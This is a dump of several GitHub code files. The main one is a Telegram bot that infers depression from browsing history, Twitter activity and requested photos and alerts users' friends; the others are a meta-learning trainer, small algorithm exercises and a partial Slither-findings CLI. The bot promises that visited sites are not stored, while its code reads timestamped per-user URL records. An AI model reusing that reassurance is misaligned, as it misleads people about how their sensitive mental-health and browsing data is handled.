\"https://chrome.google.com/webstore/detail/depression-is-weaker-than/afglhfhcelehgbbhpefplibhgkkjgjck?depressionweakerthan_user_id={}\"\n\n\nlogging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO\n)\nlogger = logging.getLogger(__name__)\n\n\ndef get_all_subscribers(user_id):\n user = User.objects.get(user_id=user_id)\n return [friend.user_id for friend in user.trusted.all() if friend.user_id is not None]\n\n\ndef get_all_subscriptions(user_id):\n user = User.objects.get(user_id=user_id)\n return [friend.user_id for friend in user.user_set.all() if friend.user_id is not None]\n\n\ndef get_user_by_username(username):\n return User.objects.get(username=username)\n\n\ndef get_subscribers_count(user_id):\n return User.objects.get(user_id=user_id).trusted.count()\n\n\nclass Stage:\n @classmethod\n def get_handlers(cls):\n raise NotImplementedError()\n\n\nclass AddFriends(Stage):\n name = \"ADD_FRIENDS\"\n _done = 'Done'\n\n @classmethod\n def get_handlers(cls):\n return [\n RegexHandler('^' + cls._done + '$', cls.done),\n MessageHandler(Filters.text, cls.add_subscriber),\n ]\n\n @staticmethod\n def add_friend(friend_username, bot, update):\n user = update.message.from_user\n friend_username = correct_username(friend_username)\n logger.info('User {} want to add friend {}'.format(user.id, friend_username))\n friend = User.objects.filter(username=friend_username).first()\n if friend is None:\n friend = User(username=friend_username)\n friend.save()\n if friend.user_id is None:\n update.message.reply_text(\n (\"I don't know {} yet. Please share link \"\n \"t.me/depression_weaker_than_tech_bot with them. \"\n \"When they register, I will be able to notify them of your status\").format(friend_username)\n )\n logger.info('Not found friend with username: {}'.format(friend_username))\n else:\n add_friend_message = (\n 'User {} has added you to their list of trusted friends. '\n 'Now I will drop you a message should they need your attention and care'\n )\n bot.send_message(\n friend.user_id,\n add_friend_message.format(user.name)\n )\n update.message.reply_text(\n 'User {} was added to list of your trusted friends.'.format(friend_username)\n )\n\n logger.info('Found friend id: ' + str(friend.user_id))\n User.objects.get(user_id=user.id).trusted.add(friend)\n return True\n\n @classmethod\n def add_subscriber(cls, bot, update):\n friend_username = update.message.text\n if not AddFriends.add_friend(friend_username, bot, update):\n return AddFriends.name\n\n user_id = update.message.from_user.id\n curr_friends_count = get_subscribers_count(user_id)\n\n if curr_friends_count >= MIN_FRIEND_COUNT:\n reply_markup = ReplyKeyboardMarkup([[cls._done]], one_time_keyboard=True)\n update.message.reply_text(\n ('If you wish, you can now add more friends. '\n 'When you are finished, press \"Done\" button. '\n 'You will also be able to add more friends later.').format(friend_username),\n reply_markup=reply_markup\n )\n else:\n update.message.reply_text(\n 'Good! Now I know {} your friend(s). '.format(curr_friends_count) +\n 'Tell me more friends!'\n )\n return cls.name\n\n @classmethod\n def done(cls, bot, update):\n update.message.reply_text(\n 'To help me monitor your browsing habits, please add my Chrome extention:\\n' +\n MY_URL.format(update.message.from_user.id) + '\\n'\n \"Don't worry, I will not gather any information except for aggregated numerical \"\n \"statistics. Sites you visit or any other sensitive data is not stored.\",\n reply_markup=ReplyKeyboardMarkup(\n [[AddExtention.agree_message]], one_time_keyboard=True\n )\n )\n\n return AddExtention.name\n\n\nclass AddExtention(Stage):\n name = \"ADD_EXTENTION\"\n agree_message = \"I have installed the extention!\"\n\n @classmethod\n def get_handlers(cls):\n return [\n RegexHandler('^' + cls.agree_message + '$', cls.done)\n ]\n\n @classmethod\n def done(cls, bot, update):\n update.message.reply_text(\n 'Great! Could you tell me your Twitter username? '\n 'I will calculate statistics based on your posts and likes.'\n 'If you don\\'t use Twitter or don\\'t want to share it with me, '\n 'just press \"' + AddTwitter.skip_message + '\".',\n reply_markup=ReplyKeyboardMarkup([[AddTwitter.skip_message]], one_time_keyboard=True)\n )\n user_object = User.objects.get(user_id=update.message.from_user.id)\n urls = user_object.url_set.order_by(\"-ts\")\n # urls = get_urls()\n result = browser_history_score_info(urls)\n logger.info('Got user {} browser history, stats: {}'.format(user_object.username, result))\n user_object.url_week_score = result['avg_week_score'][-1]\n user_object.url_month_score = result['avg_month_score']\n user_object.save()\n return AddTwitter.name\n\n\nclass AddTwitter(Stage):\n name = \"ADD_TWITTER\"\n skip_message = 'Skip'\n end_message = (\n \"That's all for now, thanks! I will monitor your activity and ping your friends if I think you need extra care.\"\n )\n\n\n @classmethod\n def get_handlers(cls):\n return [\n RegexHandler('^' + cls.skip_message + '$', cls.skip),\n MessageHandler(Filters.text, cls.enter_twitter_login),\n ]\n\n @classmethod\n def skip(cls, bot, update):\n update.message.reply_text(cls.end_message)\n user_id = update.message.from_user.id\n user = User.objects.filter(user_id=user_id).first()\n if not user.activated:\n logger.info('Run monitorings for user with id=' + str(user_id))\n Job(\n Controller.ask_for_photo, interval=timedelta(0, 40),\n context={'user_id': user_id}\n ).run(bot)\n Job(Controller.grab_stat, interval=timedelta(1), context={'user_id': user_id}).run(bot)\n user.activated = True\n user.save()\n return ConversationHandler.END\n\n @classmethod\n def enter_twitter_login(cls, bot, update):\n user_id = update.message.from_user.id\n login = update.message.text\n user = User.objects.filter(user_id=user_id).first()\n user.twitter_login = login\n user.save()\n logger.info('User {} add twitter login {}'.format(user.username, login))\n res = twitter_score_info(login)\n user.twitter_month_score = res['avg_month_score']\n user.twitter_week_score = res['avg_week_score'][-1]\n user.save()\n logger.info('Got twitter depression score of user {}: {}'.format(user.username, res))\n update.message.reply_text(cls.end_message, reply_markup=ReplyKeyboardRemove())\n if not user.activated:\n logger.info('Run monitorings for user with id=' + str(user_id))\n Job(\n Controller.ask_for_photo, interval=timedelta(0, 40),\n context={'user_id': user_id}\n ).run(bot)\n Job(Controller.grab_stat, interval=timedelta(1), context={'user_id': user_id}).run(bot)\n user.activated = True\n user.save()\n return ConversationHandler.END\n\n\nclass Controller:\n DEPRESSED = \"/i_m_depressed\"\n ADD_FRIEND = '/add_friend'\n HELP = '/help'\n REGISTER = '/register'\n QUEST = '/quest'\n FRIEND_LIST = '/friend_list'\n REMOVE_FRIEND = '/remove_friend'\n FRIEND_TO = '/friend_to_list'\n\n STATE = {\n }\n\n @classmethod\n def run_bot(cls):\n cls._updater = Updater(TOKEN)\n dispatcher = cls._updater.dispatcher\n\n meeting_conversation_stages = [AddFriends, AddExtention, AddTwitter, ]\n meeting_conversation_handler = ConversationHandler(\n entry_points=[CommandHandler('register', cls.register)],\n states={stage.name: stage.get_handlers() for stage in meeting_conversation_stages},\n fallbacks=[],\n )\n dispatcher.add_handler(meeting_conversation_handler)\n\n quest_conversation_handler = ConversationHandler(\n entry_points=[CommandHandler('quest', cls.start_quest)],\n states={\"select\": [MessageHandler(Filters.text, cls.select_perspective)], \"quest\": [MessageHandler(Filters.text, cls.quest)]},\n fallbacks=[],\n )\n dispatcher.add_handler(quest_conversation_handler)\n\n dispatcher.add_handler(CommandHandler('start', cls.start_meeting))\n dispatcher.add_handler(CommandHandler(\n cls.DEPRESSED[1:],\n lambda bot, update: cls.notify_friends_about_depression(update.message.from_user.id)\n ))\n dispatcher.add_handler(CommandHandler(cls.HELP[1:], cls.print_help))\n dispatcher.add_handler(CommandHandler(cls.ADD_FRIEND[1:], cls.add_friend))\n dispatcher.add_handler(CommandHandler(cls.REMOVE_FRIEND[1:], cls.remove_friend))\n dispatcher.add_handler(CommandHandler(cls.FRIEND_TO[1:], cls.friend_to))\n dispatcher.add_handler(CommandHandler(cls.FRIEND_LIST[1:], cls.friend_list))\n dispatcher.add_handler(MessageHandler(Filters.photo, cls.analyze_photo))\n dispatcher.add_handler(CommandHandler('_grab_stat', cls.grab_stat))\n\n bot = cls.get_bot()\n for user_object in User.objects.all():\n if not user_object.activated:\n continue\n user_id = user_object.user_id\n logger.info('Run monitorings for user with id=' + str(user_id))\n Job(\n cls.ask_for_photo, interval=timedelta(0, 40),\n context={'user_id': user_id}\n ).run(bot)\n Job(cls.grab_stat, interval=timedelta(1), context={'user_id': user_id}).run(bot)\n\n cls._updater.start_polling()\n cls._updater.idle()\n\n @classmethod\n def start_meeting(cls, bot, update):\n user = User.objects.filter(username=update.message.from_user.name).first()\n if not user:\n user = User(username=update.message.from_user.name)\n user.user_id = update.message.from_user.id\n user.save()\n\n update.message.reply_text('Hi!')\n\n update.message.reply_text(\n \"I can help self-diagnose and fight mild cases of depression \"\n \"by informing your friends that you need care.\\n\"\n \"You can learn more about me here: http://depressionweakerthan.tech. \\n\"\n \"If you want, you can just lurk and recieve notifications about your friends' statuses. \"\n \"However, I strongly recommend you to add trusted friends and install my browser extension. \"\n \"It is a good idea to take care of yourself even if you don't think you could ever get depressed.\\n\"\n )\n\n subscriptions = get_all_subscriptions(update.message.from_user.id)\n for subscription in subscriptions:\n update.message.reply_text(\n 'User {} has added you as trusted friend'.format(cls.get_username(subscription))\n )\n update.message.reply_text(\"Type /help to get a list of all avaliable commands.\")\n\n @classmethod\n def get_bot(cls):\n if getattr(cls, '_updater', None) is None:\n cls._updater = Updater(TOKEN)\n return cls._updater.bot\n\n @classmethod\n def get_username(cls, user_id):\n bot = cls.get_bot()\n return bot.get_chat_member(user_id, user_id).user.name\n\n @classmethod\n def depression_detected(cls, user_id):\n cls.notify_friends_about_depression(user_id)\n cls.notify_user_about_depression(user_id)\n\n @classmethod\n def notify_user_about_depression(cls, user_id):\n bot = cls.get_bot()\n bot.send_message(\n user_id,\n \"I'm worring about your recent Internet activity. \"\n \"Honestly, I think you are a little bit depressed! :(\\n\"\n \"Try to relax and talk to your friends about your feelings. I hope, you will cheer up!\"\n )\n\n @classmethod\n def notify_friends_about_depression(cls, user_id):\n bot = cls.get_bot()\n username = cls.get_username(user_id)\n for subscriber in get_all_subscribers(user_id):\n bot.send_message(\n subscriber,\n 'I noticed that your friend, ' + username +\n ', is feeling a little bit unhappy lately. '\n 'You should talk to them and ask about their feelings.'\n )\n\n @classmethod\n def print_help(cls, bot, update):\n update.message.reply_text(\n 'Type ' + cls.HELP + ' to get help (prints this message).\\n'\n 'Type ' + cls.QUEST + ' to play my small game about depression.\\n'\n 'Type /register to allow me monitor your mental wellness, if you have not already.\\n'\n 'Type ' + cls.DEPRESSED + ' to tell your freinds that your is depressed.\\n'\n 'Type \"' + cls.ADD_FRIEND + ' @friend_username\" to add person with username '\n '@friend_username to your friends. He or she will be notified if I somehow '\n 'realize that you are depressed.\\n'\n 'Also you can send me your photo. It also'\n ' helps me to predict whether you depressed or not.\\n'\n )\n\n @classmethod\n def analyze_photo(cls, bot, update):\n photo_file = bot.get_file(update.message.photo[-1].file_id)\n user = update.message.from_user\n photo_file_name = '{}_photo.jpg'.format(user.name)\n photo_file.download(photo_file_name)\n logger.info(\"Photo of user %s was downloaded: %s\", user.name, photo_file_name)\n try:\n scores = analyze_photo(photo_file_name)\n except ValueError as e:\n update.message.reply_text(\"I can't find any face on this photo :(\")\n return\n logger.info(photo_file_name + ' scores: ' + str(scores))\n if scores['sadness'] > 0.5:\n cls.notify_friends_about_depression(user.id)\n update.message.reply_text(\n \"Not the greatest day, is it? Anyway, keep your chin up! \"\n \"Waiting for the next photo :)\"\n )\n else:\n update.message.reply_text('Nice photo! Now I\\'m looking forward for the next one :)')\n\n @classmethod\n def add_friend(cls, bot, update):\n splited_message = update.message.text.split(maxsplit=1)\n if len(splited_message) < 2:\n update.message.reply_text(\n 'You should pass to this command your friend username, like this:\\n' +\n cls.ADD_FRIEND + ' @friend_username'\n )\n else:\n friend_username = splited_message[1]\n AddFriends.add_friend(friend_username, bot, update)\n\n @classmethod\n def ask_for_photo(cls, bot, job):\n user_id = job.context['user_id']\n logger.info('Send photo request to user with id=' + str(user_id))\n bot.send_message(user_id, 'Send me a photo, please!')\n\n @classmethod\n def register(cls, bot, update):\n update.message.reply_text(\n \"Now you can tell me username of a person whom you trust. \"\n \"They will be notified if you ever get depressed. \"\n \"You can add any number of friends, but enter one username at a time. \"\n )\n\n return AddFriends.name\n\n @classmethod\n def start_quest(cls, bot, update):\n game = Game()\n cls.STATE[update.message.from_user.id] = game\n update.message.reply_text(game.start(), reply_markup=ReplyKeyboardMarkup([[\"Healthy\"], [\"Depressive\"]], one_time_keyboard=True))\n return \"select\"\n\n @classmethod\n def select_perspective(cls, bot, update):\n desc = cls.STATE[update.message.from_user.id].select_perspective(update.message.text)\n update.message.reply_text(\"Let's start the game\")\n update.message.reply_text(desc)\n update.message.reply_text(\"Select, where you want to spend next couple of hours\",\n reply_markup=ReplyKeyboardMarkup([[\"Bed\"], [\"Kitchen\"], [\"School\"]], one_time_keyboard=True))\n return \"quest\"\n\n @classmethod\n def quest(cls, bot, update):\n desc = cls.STATE[update.message.from_user.id].take_move(update.message.text)\n game = cls.STATE[update.message.from_user.id]\n if cls.STATE[update.message.from_user.id].time == 3:\n update.message.reply_text(desc)\n if game.finished:\n update.message.reply_text(\"Thank you for playing! You can see now that depression can affect your state. You should register now to get help when you need it.\")\n return -1\n else:\n update.message.reply_text(\"Thats all! Now it is time to live the same day from the other perspective.\")\n game.finished = 1\n game.state = \"Bed\"\n game.time = 0\n game.positive = not game.positive\n update.message.reply_text(game.get_description())\n update.message.reply_text(\"Select, where you want to spend next couple of hours\",\n reply_markup=ReplyKeyboardMarkup([[\"Bed\"], [\"Kitchen\"], [\"School\"]], one_time_keyboard=True))\n return \"quest\"\n\n @classmethod\n def grab_stat(cls, bot, job_or_update):\n if isinstance(job_or_update, Job):\n user_id = job_or_update.context['user_id']\n elif isinstance(job_or_update, Update):\n user_id = job_or_update.message.from_user.id\n else:\n raise ValueError('job_or_update should be Updater or Job')\n user = User.objects.filter(user_id=user_id).first()\n login = user.twitter_login\n if login is not None:\n today_twitter_score = twitter_score_info(login, deep_days=1)['avg_month_score']\n user.twitter_month_score *= 29.0 / 30.0\n user.twitter_month_score += today_twitter_score / 30.0\n user.twitter_week_score *= 6.0 / 7.0\n user.twitter_week_score += today_twitter_score / 7.0\n\n urls = user.url_set.order_by(\"-ts\")\n # urls = get_urls()\n today_url_score = browser_history_score_info(urls, deep_days=1)['avg_month_score']\n user.url_month_score *= 29.0 / 30.0\n user.url_month_score += today_url_score / 30.0\n user.url_week_score *= 6.0 / 7.0\n user.url_week_score += today_url_score / 7.0\n\n user.save()\n logger.info('Got stat for user ' + user.username)\n is_depressed = detect_depression(\n user.url_month_score, user.url_week_score,\n user.twitter_month_score, user.twitter_week_score\n )\n if isinstance(job_or_update, Update):\n job_or_update.message.reply_text((\"Here is some stats about you:\\n\"\n \"Browsing score: {} this month, {} this week\\n\"\n \"Twitter score: {} this month, {} this week\").format(\n user.url_month_score, user.url_week_score,\n user.twitter_month_score or 0, user.twitter_week_score or 0))\n if is_depressed:\n logger.info('User {} is depressed'.format(user.username))\n cls.depression_detected(user_id)\n\n @classmethod\n def friend_to(cls, bot, update):\n user_id = update.message.from_user.id\n user = User.objects.get(user_id=user_id)\n update.message.reply_text((\n \"These users chose you as friend:\\n\" +\n \", \".join([\n friend.username for friend in user.user_set.all()\n ])\n ))\n\n @classmethod\n def friend_list(cls, bot, update):\n user_id = update.message.from_user.id\n user = User.objects.get(user_id=user_id)\n update.message.reply_text((\n \"Your friends are:\\n\" +\n \", \".join([\n friend.username for friend in user.trusted.all()\n ])\n ))\n\n @classmethod\n def remove_friend(cls, bot, update):\n friend_username = update.message.text.split(maxsplit=1)[1]\n friend_username = correct_username(friend_username)\n user_object = User.objects.get(user_id=update.message.from_user.id)\n try:\n friend = user_object.trusted.get(username=friend_username)\n except User.DoesNotExist as e:\n friend = None\n if friend is None:\n update.message.reply_text(\n 'Sorry, you don\\'t have {} in the friend list'.format(friend_username)\n )\n else:\n user_object.trusted.remove(friend)\n update.message.reply_text(\n 'I removed {} from your friend list'.format(friend_username)\n )\n if friend.user_id is not None:\n bot.send_message(\n friend.user_id,\n '{} asked me to delete you, from his or her friend list. '\n 'Now you won\\'t be notified about this user'\n )\n","repo_name":"nzinov/depressionweakerthan.tech","sub_path":"backend/bot/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":23871,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"14775029445","text":"from dataset import FewShotDataset \nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom tqdm.notebook import tqdm\nimport copy\nfrom scipy import stats\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nclass MetaLearnerHelper():\n ''' Class to perform training and validation of the meta learner\n - model_learner (Learner): the Learner() model\n - model_meta (MetaLearner): the MetaLearner() model\n - k_shot (int): what k shot value to use\n - criterion (nn.loss): which loss function to use\n NOTE: majority of the code is my own code. I was aided in some areas by an implementation at \n https://github.com/markdtw/meta-learning-lstm-pytorch/ to help structure the training functions.\n There are inherit similarities with this implementation and others since there are only so many\n ways to do the same thing.\n '''\n def __init__(self, model_learner, model_meta, k_shot, criterion=nn.NLLLoss(reduction='mean')):\n self.model_learner = model_learner.to(device)\n self.model_learner_outer = copy.deepcopy(self.model_learner)\n self.model_meta = model_meta.to(device)\n self.num_params = self.model_meta.num_params\n self.criterion = criterion\n self.k_shot = k_shot\n\n assert self.k_shot == 5 or self.k_shot == 1\n\n # create training datasets\n train_dataset = FewShotDataset(self.k_shot, 'train')\n val_dataset = FewShotDataset(self.k_shot, 'val')\n test_dataset = FewShotDataset(self.k_shot, 'test')\n\n self.train_data_loader = torch.utils.data.DataLoader(train_dataset, batch_size=1, shuffle=False)\n self.val_data_loader = torch.utils.data.DataLoader(val_dataset, batch_size=1, shuffle=False)\n self.test_data_loader = torch.utils.data.DataLoader(test_dataset, batch_size=1, shuffle=False)\n\n self.num_inner_epochs = 5 if self.k_shot == 5 else 12\n\n def get_grads(self):\n ''' Get the parameters for the model in one flattened tensor\n '''\n return torch.cat([p.grad.view(-1) for p in self.model_learner.parameters()])\n\n def erase_batch_stats(self):\n ''' Erase the batch statistics of the learner model. The paper suggests\n we do this on every new dataset D\n '''\n batch_norms = [nn.BatchNorm1d, nn.BatchNorm2d, nn.BatchNorm3d]\n for module in self.model_learner.modules():\n if isinstance(module, tuple(batch_norms)):\n module.reset_running_stats()\n for module in self.model_learner_outer.modules():\n if isinstance(module, tuple(batch_norms)):\n module.reset_running_stats()\n\n def update_model_params(self, new_params):\n ''' Copies the params from new_params into the model params to update them\n - new_params (torch.Tensor): tensor of the flattened params for model\n '''\n i = 0\n for param in self.model_learner.parameters():\n j = i + param.numel()\n param.data.copy_(new_params[i:j].reshape(param.shape))\n i = j\n \n def _calc_conf_inter(self, all_acc):\n ''' Calculate the 95% confidence interval for the accuracy data\n all_acc (list): list of accuracies\n returns mean (float), size of the conf interval (float)\n '''\n sample_mean = np.mean(all_acc)\n sample_std = np.std(all_acc)\n sem = sample_std / np.sqrt(len(all_acc))\n ci = stats.t.interval(0.95, len(all_acc) - 1, loc=sample_mean, scale=sem)\n ci_size = (ci[1] - ci[0]) / 2 \n return sample_mean, ci_size\n\n def train_inner_learner(self, train_data):\n ''' Train the learner using updates from the meta learner\n - train_data (tuple): contains train images and labels\n '''\n hs_lstm = None\n hs_meta_lstm = {'i': torch.zeros((self.num_params, self.model_meta.meta_lstm.hidden_size)).to(device),\n 'f': torch.zeros((self.num_params, self.model_meta.meta_lstm.hidden_size)).to(device),\n 'theta': self.model_meta.meta_lstm.theta}\n train_images, _, train_labels, _ = train_data\n\n train_images = train_images.squeeze().to(device)\n train_labels = train_labels.squeeze().to(device)\n training_losses = []\n\n # train learner for self.num_inner_epochs\n for epoch in range(self.num_inner_epochs): \n # get new theta values from meta learner\n self.update_model_params(hs_meta_lstm['theta'])\n \n self.model_learner.zero_grad()\n\n out = self.model_learner(train_images)\n loss = self.criterion(out, train_labels)\n training_losses.append(loss.item())\n\n loss.backward()\n\n # get gradients of each param and use meta LSTM to update params\n flattened_grads = self.get_grads()\n hs_lstm, hs_meta_lstm = self.model_meta(flattened_grads, loss, hs_lstm, hs_meta_lstm)\n\n return hs_meta_lstm['theta']\n \n def train_meta_learner(self, num_epochs, model_path, grad_clip=0.25):\n ''' Train the entire meta learner.\n - num_epochs (int): number of epochs to train entire model for\n - grad_clip (float): gradient clipping value to use\n '''\n # use values from hyperparam tuning\n max_lr = 6.9e-4 if self.k_shot == 5 else 1.2e-3\n\n optimizer = torch.optim.Adam(self.model_meta.parameters(), lr=max_lr)\n\n # create cyclic learning rate with value found from tuning\n # step size is approx 5 times num iterations in one epoch\n lr_scheduler = torch.optim.lr_scheduler.CyclicLR(optimizer, base_lr=max_lr/4, \n max_lr=max_lr, step_size_up=2000,\n mode='triangular2', cycle_momentum=False)\n\n running_acc, running_loss, running_count = 0.0, 0.0, 0\n all_loss = []\n all_val_loss = []\n loss_every = 100\n\n pbar = tqdm(range(num_epochs),\n desc=\"training\", position=1)\n \n best_val_acc = 0\n \n idx = 0\n for epoch in pbar:\n # create a new dataset every iteration\n self.train_data_loader.dataset.shuffle_datasets()\n for train_data in self.train_data_loader:\n _, test_images, _, test_labels = train_data\n test_images = test_images.squeeze().to(device)\n test_labels = test_labels.squeeze().to(device)\n optimizer.zero_grad()\n self.erase_batch_stats()\n self.model_learner.train()\n self.model_learner_outer.train()\n\n theta = self.train_inner_learner(train_data)\n\n # transfer learned parameters to seperate learner model for loss calc\n self.model_learner_outer.transfer_params(self.model_learner, theta)\n test_output = self.model_learner_outer(test_images)\n loss = self.criterion(test_output, test_labels)\n\n pred_test_labels = torch.argmax(test_output, dim=1)\n correct = (pred_test_labels == test_labels).sum().item()\n acc = correct / test_labels.shape[0]\n\n running_loss += loss.item()\n running_acc += acc\n running_count += 1\n\n # calculate the meta learner gradients and update the grads accordingly\n meta_grads = torch.autograd.grad(loss, self.model_meta.parameters())\n for i, param in enumerate(self.model_meta.parameters()):\n param.grad = meta_grads[i]\n\n # Clip the gradients\n nn.utils.clip_grad_norm_(self.model_meta.parameters(), grad_clip)\n\n optimizer.step()\n lr_scheduler.step()\n\n pbar.set_description(f'''epoch: {epoch} loss: {running_loss/running_count:.3f} \n acc: {running_acc/running_count*100:.2f}''')\n \n if idx % loss_every == loss_every - 1:\n running_loss /= running_count\n all_loss.append(running_loss)\n print(f'epoch: {epoch:3d} iter: {idx} loss: {running_loss:6.4f} acc: {running_acc/running_count*100:5.2f}%')\n running_acc, running_loss, running_count = 0.0, 0.0, 0\n idx += 1\n \n ################################\n # validation after every epoch #\n ################################\n val_loss, val_acc = self.valid_meta_learner(is_valid=True, use_pbar=False)\n all_val_loss.append(val_loss)\n print(f'VALIDATION iter: {idx} loss: {val_loss:6.4f} acc: {val_acc[0]*100:5.2f}%')\n \n # save best model\n if val_acc[0] > best_val_acc:\n best_val_acc = val_acc[0]\n torch.save({\n 'model_meta_state_dict': self.model_meta.state_dict(),\n 'model_learner_state_dict': self.model_learner.state_dict(),\n 'model_learner_outer_state_dict': self.model_learner_outer.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'iter': idx,\n 'epoch': epoch,\n 'acc': val_acc,\n 'all_loss': all_loss,\n 'valid_loss': all_val_loss\n }, f'{model_path}')\n \n def valid_meta_learner(self, is_valid, use_pbar=False):\n ''' Perform validation or testing on the meta learner\n - is_valid (bool): true if validation, false if testing set\n - use_pbar (bool): whether or not to display a progress bar\n '''\n name = 'valid' if is_valid else 'test'\n data_loader = self.val_data_loader if is_valid else self.test_data_loader\n\n running_acc, running_loss, running_count = 0.0, 0.0, 0\n all_acc = []\n loss_every = 100\n\n if use_pbar:\n pbar = tqdm(data_loader,\n desc=name, position=1)\n else:\n pbar = data_loader\n\n # loop through all the images\n for idx, data in enumerate(pbar):\n _, test_images, _, test_labels = data\n test_images = test_images.squeeze().to(device)\n test_labels = test_labels.squeeze().to(device)\n\n self.erase_batch_stats()\n self.model_meta.eval()\n self.model_learner.train()\n\n # train inner learner and get theta values\n theta = self.train_inner_learner(data)\n \n # update the model params and get output\n self.update_model_params(theta)\n test_output = self.model_learner(test_images)\n loss = self.criterion(test_output, test_labels)\n\n # get predictions\n pred_test_labels = torch.argmax(test_output, dim=1)\n correct = (pred_test_labels == test_labels).sum().item()\n acc = correct / test_labels.shape[0]\n all_acc.append(acc)\n\n running_loss += loss.item()\n running_acc += acc\n running_count += 1\n\n if use_pbar:\n pbar.set_description(f'''{name} loss: {running_loss/running_count:.3f} \n acc: {running_acc/running_count*100:.2f}''')\n # get confidence interval\n conf_int = self._calc_conf_inter(all_acc) \n \n return running_loss / running_count, conf_int\n","repo_name":"alexrog/few-shot-learning","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":10480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24800301772","text":"import sys\nfrom collections import deque\ninput = sys.stdin.readline\n\n\ndef topology_sort():\n\n q = deque()\n\n for i in range(1, n + 1):\n if indegree[i] == 0:\n q.append(i)\n\n while q:\n\n x = q.popleft()\n\n for nx in graph[x]:\n\n indegree[nx] -= 1\n res[nx] = max(res[nx], d[nx-1]+res[x])\n\n if indegree[nx] == 0:\n q.append(nx)\n\n\nt = int(input())\n\nfor _ in range(t):\n\n n, k = map(int, input().split())\n d = list(map(int, input().split()))\n indegree = [0] * (n + 1)\n graph = [[] for _ in range(n + 1)]\n res = [0] * (n + 1)\n\n for _ in range(k):\n\n a, b = map(int, input().split())\n graph[a].append(b)\n indegree[b] += 1\n\n for i in range(1, n + 1):\n res[i] = d[i-1]\n\n topology_sort()\n\n w = int(input())\n\n print(res[w])\n","repo_name":"JUNGJUNSEO/baekjun","sub_path":"백준/1005_ACM Craft_221222.py","file_name":"1005_ACM Craft_221222.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11547685807","text":"#!/usr/local/bin/python3\n'''\nProblem 10 : Summation of primes\nThe sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.\nFind the sum of all the primes below two million.\nhttps://projecteuler.net/problem=10\n---\n프로그래머 Programmer : 제이스 Jace (https://jacealan.github.io)\n사용언어 Language : 파이썬 Python 3.6.4\nOS : macOS High Sierra 10.13.3\n에디터 Editor : Visual Studio Code\n'''\n\n\ndef is_prime(x, known_prime):\n '''솟수 여부 확인\n\n 솟수이면 True\n 솟수가 아니면 False'''\n if x == 2:\n return True\n for i in known_prime:\n if x % i == 0:\n return False\n return True\n\n\ndef solution1():\n '''솟수의 합'''\n\n limit = 2000000\n primes = []\n for num in range(2, limit + 1):\n if num in primes:\n continue\n if is_prime(num, primes):\n primes.append(num)\n print(sum(primes))\n\n\ndef solution2():\n '''솟수의 합'''\n\n limit = 100000\n numbers = list(range(2, limit + 1))\n primes = []\n num = numbers[0]\n while True:\n if is_prime(num, primes):\n for i in numbers[:]:\n if i % num == 0:\n numbers.remove(i)\n primes.append(num)\n # print(sum(primes), primes)\n print(len(numbers))\n\n if len(numbers) == 0:\n break\n num = numbers[0]\n print(sum(primes))\n\n\ndef solution3():\n '''솟수의 합'''\n\n limit = 100000\n nums = list(range(2, limit + 1))\n primes = []\n num = nums[0]\n while num < limit + 1:\n if is_prime(num, primes):\n nums = sorted(\n list(set(nums) - set(list(range(num, limit + 1, num)))))\n primes.append(num)\n # print(nums)\n if len(nums) == 0:\n break\n num = nums[0]\n # print()\n print(sum(primes))\n\n\nif __name__ == '__main__':\n solution1()\n # solution2()\n # solution3()\n","repo_name":"jacealan/eulernet","sub_path":"level1/10-Summation of primes.py","file_name":"10-Summation of primes.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"75405551687","text":"import argparse\nimport json\nfrom collections import defaultdict\nfrom cmd import Cmd\n\n\nclass FindingsCLI(Cmd):\n def __init__(self, findings_by_impact):\n super(FindingsCLI, self).__init__()\n self.prompt = \"∴ \"\n self.findings_by_impact = findings_by_impact\n\n def do_count(self, _):\n \"\"\"List number of findings by impact.\"\"\"\n self.count_findings(self.findings_by_impact)\n print()\n\n def do_list(self, impact):\n \"\"\"List findings with a specific impact level.\n Usage: impact [high|medium|low|informational|optimization]\n \"\"\"\n if impact == None or impact not in self.findings_by_impact.keys():\n print(\"Please provide a valid impact level.\")\n return\n self.print_findings(impact.lower(), self.findings_by_impact)\n print()\n\n def do_detail(self, args):\n \"\"\"Display the full details of a specific finding by its number in the impact list.\n Usage: detail [impact] [number]\n \"\"\"\n if args.count(\" \") != 1:\n print(\"Please provide impact and a valid finding number.\")\n else:\n impact, number = args.lower().split()\n if impact not in self.findings_by_impact.keys():\n print(\"Please provide a valid impact level.\")\n return\n try:\n index = int(number) - 1\n finding = self.findings_by_impact[impact][index]\n display_finding(finding)\n except (IndexError, ValueError):\n print(\"Please provide a valid finding number.\")\n print()\n\n def do_exit(self, _):\n \"\"\"Exit the Findings CLI.\"\"\"\n print(\"Exiting...\")\n return True\n\n def do_EOF(self, _):\n \"\"\"Exit the Findings CLI using Ctrl-D.\"\"\"\n print(\"Exiting...\")\n return True\n\n def print_findings(self, impact, findings_by_impact):\n (\"--------------------\")\n print(f\"Finding Impact: {impact}\")\n print(f\"Number of Findings: {len(findings_by_impact[impact])}\")\n\n counter = 0\n\n for f in findings_by_impact[impact]:\n counter += 1\n print(f\"{counter}. {f['check']}\")\n print(f[\"description\"])\n # print reference: Reference: https://github.com/crytic/slither/wiki/Detector-Documentation#reentrancy-vulnerabilities-2\n\n def count_findings(self, findings_by_impact):\n print(\"# of Findings by Impact\")\n # Determine the length of the longest impact string\n longest_impact_length = max(len(impact) for impact in findings_by_impact.keys())\n # Print findings\n for impact in findings_by_impact.keys():\n print(\n f\" {impact.capitalize():{longest_impact_length}} {len(findings_by_impact[impact])}\"\n )\n\n def do_sum(self, impact):\n \"\"\"Summarize the number of findings with the specified impact grouped by check type.\n Usage: summarize [high|medium|low|informational|optimization]\n \"\"\"\n if impact not in 